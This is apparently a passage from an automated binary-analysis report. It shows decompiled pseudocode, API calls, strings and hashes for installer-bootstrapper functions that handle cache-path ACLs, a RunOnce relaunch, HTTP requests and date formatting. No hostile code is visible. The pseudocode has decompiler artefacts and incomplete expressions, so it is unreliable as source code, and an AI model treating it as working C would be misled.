                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastVersion
                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 305913169-1971907631
                                                                                                                                                                  • Opcode ID: 35c09f2212805f310ab3577de3f8654f1ff02d6c205b15a8912165344749f862
                                                                                                                                                                  • Instruction ID: 9a6f724705f57ef5a22e9559695505b0383d100e24c63a5ca905ca124a6c5efc
                                                                                                                                                                  • Opcode Fuzzy Hash: 35c09f2212805f310ab3577de3f8654f1ff02d6c205b15a8912165344749f862
                                                                                                                                                                  • Instruction Fuzzy Hash: 8541F971A04224BAE7209A75DD0EFEB7AB8EF8D710F00056BB545F71C0D67C8E418AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00412697(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v40;
                                                                                                                                                                  				char _v72;
                                                                                                                                                                  				char _v104;
                                                                                                                                                                  				char _v108;
                                                                                                                                                                  				char _v136;
                                                                                                                                                                  				signed int _v140;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t18;
                                                                                                                                                                  				void* _t23;
                                                                                                                                                                  				signed short _t31;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				void* _t41;
                                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                                  				intOrPtr* _t47;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				signed short _t52;
                                                                                                                                                                  				signed short _t56;
                                                                                                                                                                  				signed int _t57;
                                                                                                                                                                  
                                                                                                                                                                  				_t42 = __ecx;
                                                                                                                                                                  				_t18 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t18 ^ _t57;
                                                                                                                                                                  				_t46 = _a4;
                                                                                                                                                                  				_push(0x80);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v136);
                                                                                                                                                                  				E004267C0(_t40, __ecx, _t46, _t48, __eflags);
                                                                                                                                                                  				_v140 = _v140 & 0x00000000;
                                                                                                                                                                  				_t23 = E00412469(__ecx, __eflags, 0x1a, 0x1f01ff,  &_v136);
                                                                                                                                                                  				_t41 = 4;
                                                                                                                                                                  				if(_t23 >= 0) {
                                                                                                                                                                  					__eflags = E00412469(__ecx, __eflags, 0x16, 0x1f01ff,  &_v104);
                                                                                                                                                                  					if(__eflags >= 0) {
                                                                                                                                                                  						_t8 =  &_v72; // 0x412353
                                                                                                                                                                  						__eflags = E00412469(_t42, __eflags, 1, 0xa0000000, _t8);
                                                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                                                  							_t52 = E00412469(_t42, __eflags, 0x1b, 0xa0000000,  &_v40);
                                                                                                                                                                  							__eflags = _t52;
                                                                                                                                                                  							if(_t52 >= 0) {
                                                                                                                                                                  								_t31 =  &_v136;
                                                                                                                                                                  								__imp__SetEntriesInAclW(_t41, _t31, 0,  &_v140);
                                                                                                                                                                  								__eflags = _t31;
                                                                                                                                                                  								if(_t31 == 0) {
                                                                                                                                                                  									_t52 = E004380B4(_t42, _t46, 1, 0x80000005, _v108, 0, _v140, 0, 3, 0x7d0);
                                                                                                                                                                  									__eflags = _t52;
                                                                                                                                                                  									if(_t52 < 0) {
                                                                                                                                                                  										_push(_t46);
                                                                                                                                                                  										_push("Failed to secure cache path: %ls");
                                                                                                                                                                  										goto L12;
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									__eflags = _t31;
                                                                                                                                                                  									_t56 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eflags = _t56;
                                                                                                                                                                  									_t52 =  >=  ? 0x80004005 : _t56;
                                                                                                                                                                  									E004300D9(0x80004005, "cache.cpp", 0x5a0, _t52);
                                                                                                                                                                  									_push(_t46);
                                                                                                                                                                  									_push("Failed to create ACL to secure cache path: %ls");
                                                                                                                                                                  									goto L12;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_push(_t46);
                                                                                                                                                                  								_push("Failed to allocate access for Users group to path: %ls");
                                                                                                                                                                  								goto L12;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_push(_t46);
                                                                                                                                                                  							_push("Failed to allocate access for Everyone group to path: %ls");
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push(_t46);
                                                                                                                                                                  						_push("Failed to allocate access for SYSTEM group to path: %ls");
                                                                                                                                                                  						goto L12;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push(_t46);
                                                                                                                                                                  					_push("Failed to allocate access for Administrators group to path: %ls");
                                                                                                                                                                  					L12:
                                                                                                                                                                  					_push(_t52);
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v140 != 0) {
                                                                                                                                                                  					LocalFree(_v140);
                                                                                                                                                                  				}
                                                                                                                                                                  				_t47 =  &_v108;
                                                                                                                                                                  				do {
                                                                                                                                                                  					if( *_t47 != 0) {
                                                                                                                                                                  						E00431137( *_t47);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t47 = _t47 + 0x20;
                                                                                                                                                                  					_t41 = _t41 - 1;
                                                                                                                                                                  				} while (_t41 != 0);
                                                                                                                                                                  				return L004267AF(_t52, _v8 ^ _t57, _t47, _t52);
                                                                                                                                                                  			}
























                                                                                                                                                                  0x00412799
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412799
                                                                                                                                                                  0x0041274c
                                                                                                                                                                  0x0041274c
                                                                                                                                                                  0x0041274d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041274d
                                                                                                                                                                  0x0041272b
                                                                                                                                                                  0x0041272b
                                                                                                                                                                  0x0041272c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041272c
                                                                                                                                                                  0x0041270a
                                                                                                                                                                  0x0041270a
                                                                                                                                                                  0x0041270b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041270b
                                                                                                                                                                  0x004126e9
                                                                                                                                                                  0x004126e9
                                                                                                                                                                  0x004126ea
                                                                                                                                                                  0x004127cb
                                                                                                                                                                  0x004127cb
                                                                                                                                                                  0x004127cc
                                                                                                                                                                  0x004127d1
                                                                                                                                                                  0x004127db
                                                                                                                                                                  0x004127e3
                                                                                                                                                                  0x004127e3
                                                                                                                                                                  0x004127e9
                                                                                                                                                                  0x004127ec
                                                                                                                                                                  0x004127ef
                                                                                                                                                                  0x004127f3
                                                                                                                                                                  0x004127f3
                                                                                                                                                                  0x004127f8
                                                                                                                                                                  0x004127fb
                                                                                                                                                                  0x004127fb
                                                                                                                                                                  0x0041280e

                                                                                                                                                                  APIs
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 004127E3
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 0041270B
                                                                                                                                                                  • Failed to allocate access for Administrators group to path: %ls, xrefs: 004126EA
                                                                                                                                                                  • S#A, xrefs: 00412715, 00412718
                                                                                                                                                                  • Failed to create ACL to secure cache path: %ls, xrefs: 00412799
                                                                                                                                                                  • Failed to secure cache path: %ls, xrefs: 004127C6
                                                                                                                                                                  • Failed to allocate access for Everyone group to path: %ls, xrefs: 0041272C
                                                                                                                                                                  • cache.cpp, xrefs: 0041278E
                                                                                                                                                                  • Failed to allocate access for Users group to path: %ls, xrefs: 0041274D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLocal
                                                                                                                                                                  • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$S#A$cache.cpp
                                                                                                                                                                  • API String ID: 2826327444-747949594
                                                                                                                                                                  • Opcode ID: 27eb83eeea9dd78cbc716efeef0e6c1be78ced3e4a523b80d9b08681d93635e3
                                                                                                                                                                  • Instruction ID: abe8aef90f17b78a688723b5d472dd4331537e2ccbca598f8ba40b9a75fa2e28
                                                                                                                                                                  • Opcode Fuzzy Hash: 27eb83eeea9dd78cbc716efeef0e6c1be78ced3e4a523b80d9b08681d93635e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 0F312832A40325B7EB2196519D45FEF76A8EF44B04F510027BA04FA1C1EAE89D94CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E00401928(short* _a4, intOrPtr _a8) {
                                                                                                                                                                  				int _v8;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				int _v16;
                                                                                                                                                                  				int _v20;
                                                                                                                                                                  				short* _t29;
                                                                                                                                                                  				signed int _t44;
                                                                                                                                                                  				int _t46;
                                                                                                                                                                  				void* _t59;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t61;
                                                                                                                                                                  				signed int _t62;
                                                                                                                                                                  
                                                                                                                                                                  				_t29 = _a4;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_t60 = 0;
                                                                                                                                                                  				if(_t29 == 0 ||  *_t29 == 0) {
                                                                                                                                                                  					L10:
                                                                                                                                                                  					_t61 = E00431C19( &_v12, 0);
                                                                                                                                                                  					__eflags = _t61;
                                                                                                                                                                  					if(_t61 >= 0) {
                                                                                                                                                                  						__eflags = _v8;
                                                                                                                                                                  						_t34 =  >  ? _v8 : 0x43b580;
                                                                                                                                                                  						_t61 = E00431ECE(_t54, _t59, _v8, _v12,  >  ? _v8 : 0x43b580, _a8,  &_v16);
                                                                                                                                                                  						__eflags = _t61;
                                                                                                                                                                  						if(_t61 < 0) {
                                                                                                                                                                  							E00430A57(_t61, "Failed to re-launch bundle process after RunOnce: %ls", _v12);
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to get current process path.");
                                                                                                                                                                  						_push(_t61);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t60;
                                                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                                                  						LocalFree(_t60);
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L16;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t54 =  &_v20;
                                                                                                                                                                  					_t60 = CommandLineToArgvW(_t29,  &_v20);
                                                                                                                                                                  					if(_t60 != 0) {
                                                                                                                                                                  						_t62 = 0;
                                                                                                                                                                  						__eflags = _v20;
                                                                                                                                                                  						if(_v20 <= 0) {
                                                                                                                                                                  							goto L10;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							goto L5;
                                                                                                                                                                  						}
                                                                                                                                                                  						do {
                                                                                                                                                                  							L5:
                                                                                                                                                                  							_t54 =  *(_t60 + _t62 * 4);
                                                                                                                                                                  							_t44 =  *_t54 & 0x0000ffff;
                                                                                                                                                                  							__eflags = _t44 - 0x2d;
                                                                                                                                                                  							if(_t44 == 0x2d) {
                                                                                                                                                                  								L7:
                                                                                                                                                                  								_t46 = CompareStringW(0x7f, 1,  &(_t54[1]), 0xffffffff, L"burn.runonce", 0xffffffff);
                                                                                                                                                                  								__eflags = _t46 - 2;
                                                                                                                                                                  								if(_t46 == 2) {
                                                                                                                                                                  									goto L9;
                                                                                                                                                                  								}
                                                                                                                                                                  								L8:
                                                                                                                                                                  								E004312A7( &_v8,  *(_t60 + _t62 * 4));
                                                                                                                                                                  								goto L9;
                                                                                                                                                                  							}
                                                                                                                                                                  							__eflags = _t44 - 0x2f;
                                                                                                                                                                  							if(_t44 != 0x2f) {
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L7;
                                                                                                                                                                  							L9:
                                                                                                                                                                  							_t62 = _t62 + 1;
                                                                                                                                                                  							__eflags = _t62 - _v20;
                                                                                                                                                                  						} while (_t62 < _v20);
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t65 =  <=  ? GetLastError() : _t49 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t61 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t49 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "engine.cpp", 0x20f, _t61);
                                                                                                                                                                  						_push("Failed to get command line.");
                                                                                                                                                                  						_push(_t61);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						L16:
                                                                                                                                                                  						if(_v16 != 0) {
                                                                                                                                                                  							CloseHandle(_v16);
                                                                                                                                                                  							_v16 = 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                  							E004380AB(_v8);
                                                                                                                                                                  						}
                                                                                                                                                                  						if(_v12 != 0) {
                                                                                                                                                                  							E004380AB(_v12);
                                                                                                                                                                  						}
                                                                                                                                                                  						return _t61;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}















                                                                                                                                                                  APIs
                                                                                                                                                                  • CommandLineToArgvW.SHELL32(?,?,?,00000000,00000000,?,?,?,?), ref: 0040195A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00401966
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,000000FF,burn.runonce,000000FF,?,?,?,?,?,?,?,?,00000000), ref: 004019CE
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00401A42
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00401A50
                                                                                                                                                                  Strings
                                                                                                                                                                  • burn.runonce, xrefs: 004019BF
                                                                                                                                                                  • Failed to get command line., xrefs: 00401994
                                                                                                                                                                  • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 00401A2F
                                                                                                                                                                  • Failed to get current process path., xrefs: 004019FB
                                                                                                                                                                  • engine.cpp, xrefs: 0040198A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArgvCloseCommandCompareErrorFreeHandleLastLineLocalString
                                                                                                                                                                  • String ID: Failed to get command line.$Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$burn.runonce$engine.cpp
                                                                                                                                                                  • API String ID: 4103824319-2635325212
                                                                                                                                                                  • Opcode ID: b7bc3b3948e77a6498472a0ea51166648e797aa5d71c3f701bb96127bda0bb63
                                                                                                                                                                  • Instruction ID: ac4432f8ad99de101b227787c47cc2601316c3d3ba50688ad5e75ee1d638d7f5
                                                                                                                                                                  • Opcode Fuzzy Hash: b7bc3b3948e77a6498472a0ea51166648e797aa5d71c3f701bb96127bda0bb63
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A41A072D00225FBCB11ABD59C85AAFB7B4EF08714F10117BFA11B62A0D7398A40CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 0040F208
                                                                                                                                                                  • StringFromGUID2.OLE32(?,0041652F,00000027), ref: 0040F225
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFromStringUuid
                                                                                                                                                                  • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                                                                                                                  • API String ID: 4041566446-2510341293
                                                                                                                                                                  • Opcode ID: 209c95779dc1d3cb754cb6fedfdc42c0beb6dae34183ea6a75561af27e831c09
                                                                                                                                                                  • Instruction ID: 04bc8a957c85bcd3b80e0c97f4dcf9d6187b76c6f5d11b35648650f0b2c3489e
                                                                                                                                                                  • Opcode Fuzzy Hash: 209c95779dc1d3cb754cb6fedfdc42c0beb6dae34183ea6a75561af27e831c09
                                                                                                                                                                  • Instruction Fuzzy Hash: D6418E76D00308ABDB20DBE5CD45B9EB7B8AB48714F60013FF905FB280D6799909CB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 53%
                                                                                                                                                                  			E004257C9(void* __ecx, void* _a4, WCHAR* _a8, void* _a12, intOrPtr _a16, intOrPtr* _a20, WCHAR* _a24, void** _a28) {
                                                                                                                                                                  				WCHAR* _v8;
                                                                                                                                                                  				intOrPtr* _t17;
                                                                                                                                                                  				WCHAR* _t19;
                                                                                                                                                                  				long _t45;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				void* _t49;
                                                                                                                                                                  
                                                                                                                                                                  				_t38 = __ecx;
                                                                                                                                                                  				_push(__ecx);
                                                                                                                                                                  				_t45 =  ==  ? 0x84c00200 : 0x84400200;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t49 = E00433F88( &_v8, _a16, 0);
                                                                                                                                                                  				if(_t49 >= 0) {
                                                                                                                                                                  					_t17 = _a20;
                                                                                                                                                                  					if(_t17 == 0 ||  *_t17 == 0) {
                                                                                                                                                                  						L7:
                                                                                                                                                                  						_t46 = HttpOpenRequestW(_a4, _a8, _v8, 0, 0, 0x456078, _t45, 0);
                                                                                                                                                                  						if(_t46 != 0) {
                                                                                                                                                                  							_t19 = _a24;
                                                                                                                                                                  							if(_t19 == 0 ||  *_t19 == 0 || HttpAddRequestHeadersW(_t46, _t19, 0xffffffff, 0x40000000) != 0) {
                                                                                                                                                                  								 *_a28 = _t46;
                                                                                                                                                                  								_t46 = 0;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								_t53 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  								E004300D9(0x80004005, "downloadengine.cpp", 0x25c, _t49);
                                                                                                                                                                  								_push("Failed to add header to HTTP request.");
                                                                                                                                                                  								_push(_t49);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  							}
                                                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                                                  								InternetCloseHandle(_t46);
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L16;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t56 =  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						_t49 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t29 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  						E004300D9(0x80004005, "downloadengine.cpp", 0x256, _t49);
                                                                                                                                                                  						_push("Failed to open internet request.");
                                                                                                                                                                  						goto L2;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t49 = E00433C35(_t38,  &_v8, _t17, 0);
                                                                                                                                                                  						if(_t49 >= 0) {
                                                                                                                                                                  							goto L7;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to append query strong to resource from URI.");
                                                                                                                                                                  						L2:
                                                                                                                                                                  						_push(_t49);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  						L16:
                                                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                                                  							E004380AB(_v8);
                                                                                                                                                                  						}
                                                                                                                                                                  						return _t49;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				_push("Failed to allocate string for resource URI.");
                                                                                                                                                                  				goto L2;
                                                                                                                                                                  			}










                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpOpenRequestW.WININET(?,?,?,00000000,00000000,00456078,84400200,00000000), ref: 00425841
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0042584D
                                                                                                                                                                  • HttpAddRequestHeadersW.WININET(00000000,?,000000FF,40000000), ref: 0042589A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004258A4
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004258ED
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add header to HTTP request., xrefs: 004258D2
                                                                                                                                                                  • Failed to open internet request., xrefs: 0042587B
                                                                                                                                                                  • Failed to allocate string for resource URI., xrefs: 004257F9
                                                                                                                                                                  • Failed to append query strong to resource from URI., xrefs: 00425828
                                                                                                                                                                  • downloadengine.cpp, xrefs: 00425871, 004258C8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorHttpLastRequest$CloseHandleHeadersInternetOpen
                                                                                                                                                                  • String ID: Failed to add header to HTTP request.$Failed to allocate string for resource URI.$Failed to append query strong to resource from URI.$Failed to open internet request.$downloadengine.cpp
                                                                                                                                                                  • API String ID: 3883690129-2273796897
                                                                                                                                                                  • Opcode ID: 13b9d01963729b7df5074c24dac6088f8320938f88ce92457662e6e81cf82dd0
                                                                                                                                                                  • Instruction ID: 6c27ab35ae45a4613ff69e05f14ba45a178f1030a5c05abe825c23cd54fdf4d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 13b9d01963729b7df5074c24dac6088f8320938f88ce92457662e6e81cf82dd0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E310A32B00725BBEB11AA65AC45B6B76E8EF44751F51012BFD01F7290DBB8CC1096EC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E00402986(void* __edx, intOrPtr _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				struct _SYSTEMTIME _v24;
                                                                                                                                                                  				short* _v28;
                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t16;
                                                                                                                                                                  				int _t44;
                                                                                                                                                                  				void* _t45;
                                                                                                                                                                  				signed int _t50;
                                                                                                                                                                  
                                                                                                                                                                  				_t16 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t16 ^ _t50;
                                                                                                                                                                  				_v32 = _a8;
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				asm("stosd");
                                                                                                                                                                  				_v28 = 0;
                                                                                                                                                                  				GetSystemTime( &_v24);
                                                                                                                                                                  				_t44 = GetDateFormatW(0x400, 1,  &_v24, 0, 0, 0);
                                                                                                                                                                  				if(_t44 != 0) {
                                                                                                                                                                  					L3:
                                                                                                                                                                  					_t45 = E00433BDF( &_v28, _t44);
                                                                                                                                                                  					if(_t45 >= 0) {
                                                                                                                                                                  						if(GetDateFormatW(0x400, 1,  &_v24, 0, _v28, _t44) != 0) {
                                                                                                                                                                  							L8:
                                                                                                                                                                  							_t45 = E00418DBD(_t44, _v32, _v28, _t44);
                                                                                                                                                                  							if(_t45 < 0) {
                                                                                                                                                                  								_push("Failed to set variant value.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t45 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  							if(_t45 >= 0) {
                                                                                                                                                                  								goto L8;
                                                                                                                                                                  							} else {
                                                                                                                                                                  								E004300D9(_t32, "variable.cpp", 0x795, _t45);
                                                                                                                                                                  								_push("Failed to get the Date.");
                                                                                                                                                                  								goto L10;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_push("Failed to allocate the buffer for the Date.");
                                                                                                                                                                  						goto L10;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t45 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  					if(_t45 >= 0) {
                                                                                                                                                                  						goto L3;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						E004300D9(_t34, "variable.cpp", 0x78d, _t45);
                                                                                                                                                                  						_push("Failed to get the required buffer length for the Date.");
                                                                                                                                                                  						L10:
                                                                                                                                                                  						_push(_t45);
                                                                                                                                                                  						E00430A57();
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v28 != 0) {
                                                                                                                                                                  					E004380AB(_v28);
                                                                                                                                                                  				}
                                                                                                                                                                  				return L004267AF(_t45, _v8 ^ _t50, _t44, _t45);
                                                                                                                                                                  			}














                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 004029B1
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,00000000,00000000), ref: 004029C5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004029D7
                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,?,00000000,?,00000000,?,00000000), ref: 00402A2A
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00402A34
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 00402A71
                                                                                                                                                                  • Failed to allocate the buffer for the Date., xrefs: 00402A12
                                                                                                                                                                  • Failed to get the required buffer length for the Date., xrefs: 004029FB
                                                                                                                                                                  • variable.cpp, xrefs: 004029F1, 00402A4E
                                                                                                                                                                  • Failed to get the Date., xrefs: 00402A58
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
